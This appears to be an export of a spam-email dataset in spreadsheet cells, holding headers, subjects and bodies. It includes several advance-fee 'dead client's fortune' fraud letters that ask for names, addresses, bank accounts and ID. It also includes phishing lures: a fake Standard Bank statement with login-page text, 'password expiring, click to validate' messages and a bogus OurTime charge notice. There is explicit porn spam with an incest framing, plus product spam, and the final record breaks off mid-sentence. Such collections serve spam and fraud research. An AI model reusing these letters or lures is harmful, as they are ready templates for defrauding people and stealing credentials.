    <t>\nHANG SENG BANK LTD.\nDES VOEUX RD. BRANCH,\nCENTRAL HONG KONG,\nHONG KONG.\n\nDear Sir,\n\n   Let me start by introducing myself. I am Mr. Wang Qin credit officer of the Hang Seng Bank Ltd.  I have a concealed business suggestion for you.Before the U.S and Iraqi war our client General. Ibrahim Moussa who was with the Iraqi forces and also business man made a numbered fixed deposit for 18 calendar months, with a value of Twenty millions Five Hundred Thousand United State Dollars only in my branch.  Upon maturity several notice was sent to him, even during the war early this year. Again after the war  another notification was sent and still no response came from him. We later find out that the General and his family had been killed during the war in bomb blast that hit their home.After further investigation it was also discovered that Gen. Ibrahim Moussa did not declare any next of kin in his official papers including the paper work of his bank deposit. And he also confided in me the last time he was at my office that no one except me knew of his deposit in my bank. So, Twenty millions Five Hundred Thousand United State Dollars is still lying in my bank and no one will ever come forward to claim it. What bothers me most is that according to the to the laws of my country at the expiration 3years and 10months  the funds will revert to the ownership of the Hong Kong Government if nobody applies to claim the funds. \n Against this backdrop, my suggestion to you is thatI will like you as a foreigner to stand as the next of kin to Gen. Ibrahim Moussa so that you will be able to receive his funds.\n \nWHAT IS TO BE DONE:\n\nI want you to know that I have had everything planned out so that we shall come out successful. I have contacted an attorney that will prepare the necessary document that will back you up as the next of kin to Gen. Ibrahim Moussa, all that is required from you at this stage is for you to provide me with your Full Names and Address so that the attorney can commence his job. After you have been made the next of kin, the attorney will also fill in for claims on your behalf and secure the necessary approval and letter of probate in your favor for the move of the funds to an account that will be provided by you. There is no risk involved at all in the matter as weare going adopt a legalized method and the attorney will prepare all the necessary documents. Please endeavor to observe utmost discretion in all matters concerning this issue.\n Once the funds have been transferred to your nominated bank account we shall share in the ratio of 70% for me, 25% for you and 5% for any expenses incurred during the course of this operation. Should you be interested please send me your private phone and fax numbers for easy communication and I will provide you with more details of this operation.\n Your earliest response to this letter will be appreciated.\n\nKind Regards,\n\nMr. Wang  Qin\n\n\n\n___________________________________________________________________________\n[URL]http://snura.net[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://snura.net</t>
  </si>
  <si>
    <t>985</t>
  </si>
  <si>
    <t>To: Recipients &lt;statement@standardbank.co.za&gt;\nFrom: Standard Bank &lt;statement@standardbank.co.za&gt;\nDate: Tue, 12 Mar 2019 03:00:42 -0700</t>
  </si>
  <si>
    <t>Tue, 12 Mar 2019 03:00:42 -0700</t>
  </si>
  <si>
    <t>Standard Bank Account eStatement 19-03-12</t>
  </si>
  <si>
    <t>Dear Customer   Please find your electronic statement for February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 and we will effect the change within thirty (30) days of receipt of your instruction.    To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com). Regards,  Standard Bank 	  	    For any queries please  call us on 0861201311 Our lines are open from 8am to 9pm Monday to Friday and 8am to 4pm on weekends  and public holidays.             Copyright Standard Bank. All rights reserved. The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider. Registered credit provider NCR CP15. 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 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 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 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 For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  Dear Customer Please find your electronic statement for February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and we will effect the change within thirty (30) days of receipt of your instruction.  To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com).Regards, Standard Bank   For any queries please call us on 0861201311Our lines are open from8am to 9pm Monday to Fridayand 8am to 4pm on weekends and public holidays.  Copyright Standard Bank. All rights reserved.The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider.Registered credit provider NCR CP15.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For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  ï»¿ Standard Bank Online Banking AutoShare/Tax Free Invest Do you want to link your account to your profile? yes no Sign out                   Hello!                                   We've enhanced the sign in feature on our new, fresh Online Banking site.                 Your password has been successfully changed. Sign in Email address Please enter a valid email address By signing in you agree to the                                           T&amp;C'sLast updated on 5 July 2017                                                                                      Next                                                                                         Two steps to quick &amp; easy sign in:Start by entering your email, then your password.                                            Register for online banking                               Your password has been successfully changed.                                Sign in Email address Please enter a valid email address                                        By signing in you accept the                                         terms and conditionsLast updated on 5 July 2017                                                                                Next                                          By signing in you accept the  terms and conditions Last updated on 5 July 2017                                                                                         Sign in                                            Register for online banking                               Received an online banking for business invitation?                                                              START HERE                                Customer Care 0800 222 050 International +27 10 249 0070 These details donât seem to be right. Please check and try again                         Password Sign-In                                              Sign in                                                 {Curent_Email}                          Password Invalid Password                                 Forgot password?                                                              Sign in                                                                  Cancel                              South Africa 0860 123 000 International +27 11 299 4701 Email us at ibsupport@standardbank.co.za Standard Bank is a licensed                    financial services provider in terms of the Financial Advisory and                    Intermediary Services Act and a registered credit provider in terms of                    the National Credit Act, registration number NCRCP15.                 Loading ‐ please wait a moment Due to account inactivity you will be automatically signed out in  seconds. Continue banking? Continue Sign out</t>
  </si>
  <si>
    <t>78</t>
  </si>
  <si>
    <t>To: "info@mail.org" &lt;info@mail.org&gt;\nFrom: Coreen Grady &lt;CGrady@nebhealth.org&gt;\nDate: Tue, 12 Jan 2016 18:14:36 +0000</t>
  </si>
  <si>
    <t>Tue, 12 Jan 2016 18:14:36 +0000</t>
  </si>
  <si>
    <t>Coreen Grady &lt;CGrady@nebhealth.org&gt;</t>
  </si>
  <si>
    <t>"info@mail.org" &lt;info@mail.org&gt;</t>
  </si>
  <si>
    <t>Password Update Help Desk</t>
  </si>
  <si>
    <t>Password will expire in 3 days. Click Here  To Validate E-mail Thank you, © 2014 Microsoft ---------------------------------------------------------------------- See our web page at [URL]http://www.lahey.org[/URL] for a full directory of Lahey sites, staff, services and career opportunities. THIS MESSAGE IS INTENDED FOR THE USE OF THE PERSON TO WHOM IT IS ADDRESSED. IT MAY CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW. If you are not the intended recipient, your use of this message for any purpose is strictly prohibited. If you have received this communication in error, please delete the message and notify the sender so that we may correct our records. Password will expire in 3 days. Click Here To Validate E-mail Thank you, © 2014 Microsoft See our web page at [URL]http://www.lahey.org[/URL] for a full directory of Lahey sites, staff, services and career opportunities. THIS MESSAGE IS INTENDED FOR THE USE OF THE PERSON TO WHOM IT IS ADDRESSED. IT MAY CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW. If you are not the intended recipient, your use of this message for any purpose is strictly prohibited. If you have received this communication in error, please delete the message and notify the sender so that we may correct our records.</t>
  </si>
  <si>
    <t>http://www.lahey.org http://www.lahey.org</t>
  </si>
  <si>
    <t>77</t>
  </si>
  <si>
    <t>To: "info@mail.org" &lt;info@mail.org&gt;\nFrom: Jen Adams-Leblanc &lt;jleblanc@nebhealth.org&gt;\nDate: Tue, 12 Jan 2016 00:12:00 +0000</t>
  </si>
  <si>
    <t>Tue, 12 Jan 2016 00:12:00 +0000</t>
  </si>
  <si>
    <t>Jen Adams-Leblanc &lt;jleblanc@nebhealth.org&gt;</t>
  </si>
  <si>
    <t>Password will expire in 3 days. Click Here To Validate E-mail Thank you, © 2014 Microsoft ---------------------------------------------------------------------- See our web page at [URL]http://www.lahey.org[/URL] for a full directory of Lahey sites, staff, services and career opportunities. THIS MESSAGE IS INTENDED FOR THE USE OF THE PERSON TO WHOM IT IS ADDRESSED. IT MAY CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW. If you are not the intended recipient, your use of this message for any purpose is strictly prohibited. If you have received this communication in error, please delete the message and notify the sender so that we may correct our records. Password will expire in 3 days. Click Here To Validate E-mail Thank you, © 2014 Microsoft See our web page at [URL]http://www.lahey.org[/URL] for a full directory of Lahey sites, staff, services and career opportunities. THIS MESSAGE IS INTENDED FOR THE USE OF THE PERSON TO WHOM IT IS ADDRESSED. IT MAY CONTAIN INFORMATION THAT IS PRIVILEGED, CONFIDENTIAL AND EXEMPT FROM DISCLOSURE UNDER APPLICABLE LAW. If you are not the intended recipient, your use of this message for any purpose is strictly prohibited. If you have received this communication in error, please delete the message and notify the sender so that we may correct our records.</t>
  </si>
  <si>
    <t>2787</t>
  </si>
  <si>
    <t>To: sharmataylr@yahoo.com\nFrom: Sharma Taylor &lt;sharmataylor100@yahoo.co.jp&gt;\nDate: Tue, 12 Dec 2006 15:00:49 -0500</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2006 15:00:49 -0500</t>
  </si>
  <si>
    <t>Sharma Taylor &lt;sharmataylor100@yahoo.co.jp&gt;</t>
  </si>
  <si>
    <t>sharmataylr@yahoo.com</t>
  </si>
  <si>
    <t>SEED OF FAITH.</t>
  </si>
  <si>
    <t>www.i-phone.org</t>
  </si>
  <si>
    <t>2785</t>
  </si>
  <si>
    <t>To: nan\nFrom: jerryikem3@alice.it\nDate: Tue, 12 Dec 2006 14:49:57 +0100</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2006 14:49:57 +0100</t>
  </si>
  <si>
    <t>jerryikem3@alice.it</t>
  </si>
  <si>
    <t>GOOD NEWS TO YOU MY FRIEND</t>
  </si>
  <si>
    <t>\n\nDear Friend,\nI did not forgot your past effort and attemps to assist me,\nnow I'm happy to inform you that i have suceeded in getting those\nfunds transferred under the cooperation of a new partner from Paraguay.\nSo Contact my secretary in(benin republic) ask him for ($700.000.00)\nfor your compensation his name is ADUNU EMMANUEL\nEmail:adunu_el2000@myway.com\nNOTE :BELWO HERE IS THE REQUIRED INFORMATIONS YOU WILL SEND TO MY SECRETARY :\n(1) YOUR FULL NAMES\n(2) YOUR HOUSE ADDRESS\n(3) YOUR DIRECT CELPHONE NUMBER AND HOUSE PHONE WITH FAX IF ANY .\n(4) YOUR ID EITHER INTERNATIONAL PAS-PORT OR DRIVING LINCES .\nRegards\nBarr.Jerry Ikem\n\n\n\n**************\nRegistrati ad Alice Basic e scarica Alice Messenger, \nil nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!\nPer maggiori informazioni vai su: \n[URL]http://adsl.alice.it[/URL]\n</t>
  </si>
  <si>
    <t>http://adsl.alice.it</t>
  </si>
  <si>
    <t>308</t>
  </si>
  <si>
    <t>To: engedetamanah@post.cz\nFrom: engedetamanah@post.cz\nDate: Tue, 12 Aug 2003 07:03:47 +0200</t>
  </si>
  <si>
    <t>Tue, 12 Aug 2003 07:03:47 +0200</t>
  </si>
  <si>
    <t>engedetamanah@post.cz</t>
  </si>
  <si>
    <t>INVESTMENT   CONTACTS.</t>
  </si>
  <si>
    <t>Sir, \n \n I am the chairman of the contract award committee,of the federal\n ministry of petroleum resources, Nigeria. I am in  search of an\nagent to assist us in the transfer of (USD25m) and subsequent\ninvestment in properties in your country.You will be required to:\n  \n (1) Assist in the transfer of the said sum \n (2) Advise on lucrative areas for investment \n (3) Assist us in purchase of properties. \n \nIf you are interested to assist us in this regard,  you shall be\ngiving 20% of the total sum.   \nYou should please respond if you are interested for  more\ndetails.   \nBest Regards \n\nEng.  Edet Amanah.\n\n-- \nHorké léto s VOLNÝ: Vyhraj Ford s klimatizací! Vice na\n[URL]http://soutez.volny.cz[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://soutez.volny.cz</t>
  </si>
  <si>
    <t>1251</t>
  </si>
  <si>
    <t>To: stefan.dusza@free.fr\nFrom: stefan.dusza@free.fr\nDate: Tue, 12 Apr 2005 20:41:58 +0200</t>
  </si>
  <si>
    <t>Tue, 12 Apr 2005 20:41:58 +0200</t>
  </si>
  <si>
    <t>stefan.dusza@free.fr</t>
  </si>
  <si>
    <t>Reply back for detailed discussion</t>
  </si>
  <si>
    <t>\n\nDear Good Friend.\n\nMy Name is Mr.Stefan Dusza a credit officer with (International Trust House)here\nin Cotonou Republic Du Benin. In my department i discovered an abandoned sum of\nUS$20M dollars (Twenty Million US dollars) in an account that belongs to one of\nour late foreign customer (MR. ANDREAS SCHRANNER from Munich, Germany)who died\nalong with his entire family in July 2000 in a plane crash. and please note\nthat my reason why of contacting is base that this is a deal between me and you\nonly.\n\nBelow is a website which i will apprecaite you go through to read the\ninformation.\n\n[URL]http://news.bbc.co.uk[/URL]\n\nSince then I have made several enquiries to locate any of the above mentioned\nperson extended\nrelatives, this has also proved abortive.\n\nNow the reason while of contacting you is base on trust to enable me present you\nas the next of kin so that this fund will be released to you as the next of kin\nor relation to the deceased for safety and subsequent disbursement since nobody\nas come for claiming of the fund and note it will be very easy to convince the\nbank since I have the necessary legalised documents that backup the fund and\nwhich will present you the rightful next of kin to the\ndeceased customer.\n\nI don't want this money to go into the bank treasury as unclaimed bill.\n\nThe banking law and guidline here stipulates that if such money remained\nunclaimed after Five years, the money will be transfered into the bank treasury\nas unclaimed fund. The request of foreigner as next of kin in this business is\noccassioned by the fact that the customer was a foreigner and an Indigen here\ncannot stand as next of kin to a foreigner.\n\nAll I require is your honest co-operation to enable us see this deal through.\n\n\nI guarantee that this will be executed under a legitimate arrangement that will\nprotect you from any breach of the law.\n\nI agree that 30% of this money will be for you as a respect to the provision of\na foriegn account , 5% will be set aside for expenses incurred during the\nbusiness,another 5% to help the less previlage and to assist the charity\norganisations here in Africa and abroad while the rest 60% would be for me\nThereafter, I will visit your country for disbursement according to the\npercentage indicated Therefore, to enable the immediate transfer of this\nfund to you arranged,you must apply first to the bank as relation or next of kin\nof the deceased indicating your bank name, your bank account number,your private\ntelephone and fax number for easy and effective communication and location where\nin the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or email the text of the\napplication . I will not fail to bring to your notice that this transaction is\nhitch-free and that you should not entertain any atom of fear as all required\narrangements have been made for the transfer. You should contact me immediately\nas soon as you receive this letter.\n\nTrusting to hear from you immediately.\n\nYours Faithfully,\n\nMr.Stefan Dusza.\n\n\n\n\n</t>
  </si>
  <si>
    <t>1252</t>
  </si>
  <si>
    <t>To: ericmadu@eresmas.com\nFrom: 2341 lagos nigeria &lt;ericmadu@eresmas.com&gt;\nDate: Tue, 12 Apr 2005 19:06:14 +0000</t>
  </si>
  <si>
    <t>Tue, 12 Apr 2005 19:06:14 +0000</t>
  </si>
  <si>
    <t>2341 lagos nigeria &lt;ericmadu@eresmas.com&gt;</t>
  </si>
  <si>
    <t>ericmadu@eresmas.com</t>
  </si>
  <si>
    <t>URGENT ATTENTION NEEDED!!!</t>
  </si>
  <si>
    <t>Dear Sir,I am Mr.Eric Madu,  I got your contact through a friend who attended a trade mission in your country, but I did not disclose the nature of the business to him. I have urgent and very confidential business proposal for you. On June 6, 1999, an America Oil consultant/contractor, Mr. Charles Fredrick with the Nigerian National Petroleum Corporation, made a numbered time (fixed) deposit for twelve calendar months, valued at US$20,700,000.00(Twenty Million Seven Hundred Thousand Dollars )in my branch upon maturity. I sent a rountine notification to his forwarding address but got no reply.After a month,we sent a reminder and finally we discovered from his contract employers,the Nigerian National Petroleum Corporation that he died in the plane crash of 31 October 1999[with Egyptian 990] with other passengers aboaed as you can confirm it yourself via the website below:[URL]www.thestate.com[/URL] on further investigation, i found out that he died without making a WILL,and attempts to trace his next of kin was fruitless.I therefore made further investigation and discovered that Mr. Charles Fredrick did not declare any next of kin or relations in all his official documents, including his bank deposit paperwork in my bank. This sum of US$20,700,000.00 is still in my bank and the interest isbeing rolled over with the pricipal sum at the end of each year.No one will ever come forward to claim it.According to Nigerian law, at the expiration of (five)years, the money will revert to the ownership of the Nigerian Government if nobody applies to claim the fund. Consequently,my proposal is that i will like you as a foreigner to stand as the next of kin to Mr. Charles Fredrick so that the fruit of this  old man's labour will not get into the hands of some corrupt Government officials. This is simple,I will like you to provide immediately your fullname and address so that the Attorney will prepare the necessary documents and affidavits which will put you in place as the next of kin. We shall employ the service of two attorney for the drafting and notarization of the WILL and obtain the necessary documents and letter of probate/administration in your favour for the transfer. Any bank account in any part of the world which you will provide will then facilitate the transfer of this money to you as the beneficiary/next of kin. The money will be paid into your account for us to share in ratio of 60% for me and 40% for you. There is no risk at all, the paperwork for this transaction will be done by the attorney and my position as the Branch Manager guarantees the successful execution of ths transaction.  If you are interested,please reply immediately via the private email address below,upon your responce,i shall provide you with more details and relevant documents that will help you understand the transaction. Please observe utmost confidentiality and be rest assured that this transaction would be most profitable for both of us because i shall require your assitance to invest my share in your country. Please upon the reciept of this mail message, send to me the following,to enable start the process of the fund into your bank  account: 1. Your full Name and contact address.2. Your private Telephone and fax numbers for prompt communication. Immediately I recieve a mail indicating your interest I shall send you more details. Thanks and Regards, Mr.Eric Madu.</t>
  </si>
  <si>
    <t>www.thestate.com</t>
  </si>
  <si>
    <t>To: Recipients &lt;Bmdun@uga.edu&gt;\nFrom: "Ourtime.com" &lt;Bmdun@uga.edu&gt;\nDate: Tue, 11 Jun 2019 03:08:08 -0700</t>
  </si>
  <si>
    <t>Tue, 11 Jun 2019 03:08:08 -0700</t>
  </si>
  <si>
    <t>"Ourtime.com" &lt;Bmdun@uga.edu&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;Bmdun@uga.edu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Ourtime payment has been comfirmed </t>
  </si>
  <si>
    <t>Dear Member,  Thank you for using OurTime.com Your request has been approved and tahe amount of $174.43 will be debited within 12 hours.  You've replaced Your 1 Month Subscription with a 6-month subscription Only $4.49 $2.49 per week! Includes: Full Mobile Access Message Read Notification Profile Highlights Message Highlight (Billed in 1 payment of $174.43 plus tax)  If you didn't make this request please visit [URL]www.ourtime.com[/URL] click or copy and paste it into your browser and log in to your account to cancel this request.  At Ourtime, we take pride in providing high quality customer service! Please take a moment to complete a brief survey regarding your payment.  We 19d appreciate your response within the next 3 days.  Thanks for taking time to share your thoughts with us! -Ourtime Customer Care Team Dear Member, Thank you for using OurTime.com Your request has been approved and tahe amount of $174.43 will be debited within 12 hours. You've replaced Your 1 Month Subscription with a6-month subscriptionOnly $4.49 $2.49 per week!Includes:Full Mobile AccessMessage Read NotificationProfile HighlightsMessage Highlight(Billed in 1 payment of $174.43 plus tax) If you didn't make this request please visit [URL]www.ourtime.com[/URL] click or copy and paste it into your browser and log in to your account to cancel this request. At Ourtime, we take pride in providing high quality customer service! Please take a moment to complete a brief survey regarding your payment. We’d appreciate your response within the next 3 days. Thanks for taking time to share your thoughts with us!-Ourtime Customer Care Team</t>
  </si>
  <si>
    <t>www.ourtime.com www.ourtime.com</t>
  </si>
  <si>
    <t>5164</t>
  </si>
  <si>
    <t>To: Customer &lt;yyyy@netnoteinc.com&gt;\nFrom: Lisa Smiley &lt;slisa@compuserve.com&gt;\nDate: Tue, 11 Jun 2002 06:15:58 +0100</t>
  </si>
  <si>
    <t>Tue, 11 Jun 2002 06:15:58 +0100</t>
  </si>
  <si>
    <t>Lisa Smiley &lt;slisa@compuserve.com&gt;</t>
  </si>
  <si>
    <t>Customer &lt;yyyy@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Customer, LIVE incest video from Russia!</t>
  </si>
  <si>
    <t>![Hot-Babies-Live]([URL]http://www.hot-babies.com[/URL]  \n---  \n![]([URL]http://www.hot-babies.com[/URL]  \n![]([URL]http://www.hot-babies.com[/URL] | ![]([URL]http://www.hot[/URL]\nbabies.com/limages/4/1x1.gif) | ![]([URL]http://www.hot[/URL]\nbabies.com/limages/4/1x1.gif)  \n---|---|---  \n![]([URL]http://www.hot-babies.com[/URL]  \n| | | | ![Janna]([URL]http://www.hot-babies.com[/URL]  \n---  \n![]([URL]http://www.hot-babies.com[/URL]  \nAge: 18 | Height 165 cms  \n---|---  \nWeight: 45 kg | Hair Color: Brunette  \nEye Color: Blue | Chest Size: 1  \nSexual Preference: Bi  \n  \n| | | ![Natasha]([URL]http://www.hot-babies.com[/URL]  \n---  \n![]([URL]http://www.hot-babies.com[/URL]  \nAge: 22 | Height 172 cms  \n---|---  \nWeight: 50 kg | Hair Color: Blonde  \nEye Color: Green | Chest Size: 2  \nSexual Preference: Bi  \n  \n![]([URL]http://www.hot-babies.com[/URL] | ![]([URL]http://www.hot[/URL]\nbabies.com/limages/4/1x1.gif)  \n|  _**     New amazing incest show**_  \n_**                            on Hot-Babies-Live.Com_**  \n  \n  \n---  \n![]([URL]http://www.hot-babies.com[/URL]  \n\n**Hot-Babies-Live.com** is a new porno site where you can see porno show in\nreal time.\n\n**Hot-Babies-Live.com** presents you a unique chance to manage a private show\nwith a real time live video chat according to your personal erotic fantasies.\n\nNow **Hot-Babies-Live.com** has organized a new show. All your sexual wishes\nwill be fulfilled in real time by two sisters from Russia, Janna and Natasha.\nThey are not only real sisters, they are the youngest models in **Hot-Babies-\nLive.com**!  \nJanna has just become 18! **Click here to check it out!**\n\nThey pet each other, lick each other and fuck each other when you ask. They\nwill never refuse. They are always full of enthusiasm and desire. They will\nturn you on in minutes!  \n  \n---  \n![Gallery]([URL]http://www.hot-babies.com[/URL]\n\nNow you can see their porno show and private recordings _absolutely free!_ See\ntheir young sexuality by yourself!  \n  \nIf you are not a member of **Hot-Babies-Live.com** club, hurry up to join now.  \n  \nYou can do it _cheaper than ever now!_  \n  \nThis offer is available for a limited time only!  \n  \n---  \n  \n&gt; This letter is NOT A SPAM! You have received it because your "A-Email\n&gt; NewsLetter" subscription is active. To check your subscription status or to\n&gt; unsubscribe, use this link:  \n  \n---  \n_[URL]http://a-email.newsletters.ckync[/URL]  \n  \n\n</t>
  </si>
  <si>
    <t>http://www.hot-babies.com http://www.hot-babies.com http://www.hot-babies.com http://www.hot http://www.hot http://www.hot-babies.com http://www.hot-babies.com http://www.hot-babies.com http://www.hot-babies.com http://www.hot-babies.com http://www.hot-babies.com http://www.hot http://www.hot-babies.com http://www.hot-babies.com http://a-email.newsletters.ckync</t>
  </si>
  <si>
    <t>5166</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: "Super Signal" &lt;service@thezs.com&gt;\nDate: Tue, 11 Jun 2002 05:32:27 -0500</t>
  </si>
  <si>
    <t>Tue, 11 Jun 2002 05:32:27 -0500</t>
  </si>
  <si>
    <t>"Super Signal" &lt;service@thezs.com&gt;</t>
  </si>
  <si>
    <t>Cell Phone Antenna Booster &amp; Hands Free Headset</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_519_80667744048 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable THE WORLDS MOST ADVANCED CELL PHONE SIGNAL BOOSTER &amp; HANDS FREE CELL PHONE = HEADSET Super Signal 2002 is the worlds most technologically advanced internal = antenna booster, and adapts to all makes and models of cell and mobile phones. Normally $19.99 each Now from $2.99 to $7.99 each! ( price based upon number of units purchased ) BONUS:  FREE Radiation Shield with each antenna purchased! Super Signal 2002 utilizes the same advanced aerospace technology used by = state-of-the-art satellite dish receivers, which results in less dropped calls,=  less dead zones, and improved reception in buildings, elevators, hallways, = tunnels, mountains, and any place where a signal is weak.  Dont miss that = urgent call from your loved ones during an emergency, natural disaster, or any = critical situation.  Get yours now! Also, check out our lightweight hands-free cellular headsets. Click below on to our website for more information at: [URL]www.thezs.com[/URL] If you are having problems clicking the link above, then copy and paste our = web address into your web browser. If you wish to no longer be included on our mailing list, please click here: = mailto:remove@nouce1.com or write us at: NOUCE1, 6822 22nd Ave. N.,  St. Petersburg, FL  33710-3918 ------=_NextPart_519_80667744048 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable  THE WORLDS MOST = ADVANCED CELL PHONE SIGNAL = BOOSTER HANDS FREE HEADSET = KIT Super Signal = 2002  is the worlds most technologically advanced internal antenna booster, and  adapts to all makes and models of cell and mobile phones.  As = seen on  TV for $19.99 each Now from $2.= 99  to $7.99 each! ( price = based upon number of units purchased )  BONUS:   FREE Radiation Shield with each antenna purchased!  Super  Signal 2002 utilizes the same  advanced aerospace technology used by state-of-the-art satellite dish = receivers,  which results in less dropped calls, less dead zones, and improved reception = in  buildings, elevators, hallways, tunnels, mountains, and any place where a = signal  is weak.  Dont miss that urgent call from your loved ones during an  emergency, natural disaster, or any critical situation.  Get yours = now!  = CLICK  HERE = for more  information on this product and other products that improve cell phone  performance!           The Very Latest Technology = in Hands = Free Cell Phone  Communications The World's Most Comfortable = Headset The Clearest Two Way Sound Ever    Achieved Reduce your risk of a phone-related    auto accident by 70%, soon to be required by law in most states!= Now available for 50% to = 80%  off retail price, as low as $8.99!     CLICK HERE  for more  information on this product and other products that improve cell phone  performance!   If you wish to unsubscribe from our opt-in mailing list, = please  click here: mailto:remove@nouce1.com = or  write us at: NOUCE1, 6822 22nd Ave. N., St. Petersburg, FL  = 33710-3918   ------=_NextPart_519_80667744048--</t>
  </si>
  <si>
    <t>www.thezs.com</t>
  </si>
  <si>
    <t>2334</t>
  </si>
  <si>
    <t>To: nan\nFrom: ben_c_ben75 &lt;ben_c_ben75@terra.com.mx&gt;\nDate: Tue, 11 Jul 2006 22:39:39 -0600</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2006 22:39:39 -0600</t>
  </si>
  <si>
    <t>ben_c_ben75 &lt;ben_c_ben75@terra.com.mx&gt;</t>
  </si>
  <si>
    <t>&gt;From The Desk Of Ben Coroma Esq, \nSenior Staff In FileDepartment, \nAfrican Development Bank A.D.B \nOuagadougouBurkina-Faso West Africa. \nCall me with this number (00226-78857597) \nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL] \n        \n("REMITTANCE OF $15 MILLION U.S.A   DOLLARS \n                            CONFIDENTIAL IS THECASE") \n\nCompliment Of The Season, \nOn a very good day. I am (Ben Coroma  Esq),asenior staff in file department in African developent bank (ADB).I gotyour contact from a tourist from your country who was in this country and transacted a business with our bank. When i was searching for aforeign partner i assured of your capability and reliability to champion this businees opportunity when i prayed to God or Allah about you.In my department we discovered an abandoned sum of $ 15 million U.S.A dollars( fifteen million U.S.A dollars) . In an account that belongs to one ofour foreign customer  who died along with his entire family in Monday 31st July 2000 in a plane crash. Since we got information about his death, we have been expecting his next of kin to come over and claim hismoney because we can not release it unless somebody applies for it asnext of kin or relation to the deceased as indicated in our banking guidelines, but unfortunately we learnt that all his supposed next ofkin or relation died along side with him at the plane crash leaving nobody behind for the claim. \nIt is therefore upon this discovery that I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 The Banking law and guideline here stipulates that if such money \nremained unclamed after five years, the money will be transfered into the Bank treasury as unclaimed fund. The request of foreigner as next of kin in this business is occasioned by the fact that the customer was a foreigner, and a Burkinabe cannot standas next of kin to a foreigner. We agree that 30 % of this money will befor you as foreign partner, in respect to the provision of a foreign account, 10 % will be set aside for expenses incured during the business and 60 % would be for me and my woman colleague. There after I and my colleague will visit your country for disbursement according to the percentages indicated. \nTherefore to enable the immediate trnansfer ofthis fund to you as arranged, you must apply first to the bank asrelations or next of kin of the deceased indicating your bank name, yourbank account number, your private telephone and fax number for easy and effective communication and location where the money will be remitted. \nUpon receipt of your reply, I will send to you by fax or emailthe text of the application I will not fail to bring to your notice that this transaction is hitch free and that you should not entertain any  atom of fear as all required arrangements have been made forthetransfer. \nYou should contact me on this email (00226-7885 7597)immediately as soon as you receive this letter. Trusting to hear fromyou immediately. \nYour's faithfully, \nBen Coroma  (Esq.) \nPOST SCRITUM:You have to keep everything secret as to enable the transfer to move very smoothly in to the account you will prove to the bank.As you finished reading this letter call me immediately so that we discuss very well over this business.Please call me and inform me that you received my mail, because i don't go to net always. \n</t>
  </si>
  <si>
    <t>2332</t>
  </si>
  <si>
    <t>To: nan\nFrom: dan asante &lt;danasante777@hotmail.com&gt;\nDate: Tue, 11 Jul 2006 18:11:47 +0000</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2006 18:11:47 +0000</t>
  </si>
  <si>
    <t>dan asante &lt;danasante777@hotmail.com&gt;</t>
  </si>
  <si>
    <t>REPLY TIMELY</t>
  </si>
  <si>
    <t>FROM THE DESK OF DAN ASANTE\nSENIOR STAFF IN FILE DEPARTMENT,\nINTERNATIONAL COMMERCIAL BANK I.C.B\nACCRA,GHANA.WEST AFRICA.\n\nPLANE CRASH WEB SITE\nHTTP://WWW.CNN.COM/2003/WORLD/AFRICA/12/26/BENIN.CRASH/INDEX.HTML\n   ( "REMITTANCE OF $15 MILLION U.S.A DOLLARS CONFIDENTIAL IS THE\nCASE")\n              COMPLIMENT OF THE SEASON,\nON A VERY GOOD DAY. I AM (DAN ASANTE) A SENIOR STAFF IN FILE DEPARTMENT IN \nINTERNATIONAL COMMERCIAL BANK(I.C.B).I GOT YOUR CONTACT FROM A YAHOO TOURIST \nSEARCH.WHEN I WAS SEARCHING FOR A FOREIGN PARTNER I ASSURED OF YOUR \nCAPABILITY AND RELIABILITY TO CHAMPION THIS BUSINEES OPPORTUNITY  WHEN I \nPRAYED TO GOD OR ALLAH ABOUT YOU.IN MY DEPARTMENT WE DISCOVERED AN ABANDONED \nSUM OF $ 15 MILLION U.S.A DOLLARS ( FIFTEEN MILLION U.S.A DOLLARS) . IN AN \nACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ALONG WITH HIS \nENTIRE FAMILY IN (FRIDAY DECEMBER 26,2003  ) IN A PLANE CRASH. SINCE WE GOT \nINFORMATION ABOUT HIS DEATH,\n\nWE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY \nBECAUSE WE CANNOT RELEASE IT UNLESS SOMEBODY APPLIES FOR IT AS NEXT OF KIN \nOR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES, BUT \nUNFORTUNATELY WE LEARNT THAT ALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED \nALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM. \nIT IS THEREFORE UPON THIS DISCOVERY THAT I AND ONE OFFICIAL IN MY DEPARTMENT \nNOW DECIDED TO MAKE THIS BUSINNESS PROPOSAL TO YOU AND RELEASE THE MONEY TO \nYOU AS THE NEXT OF KIN OR RELATION TO THE 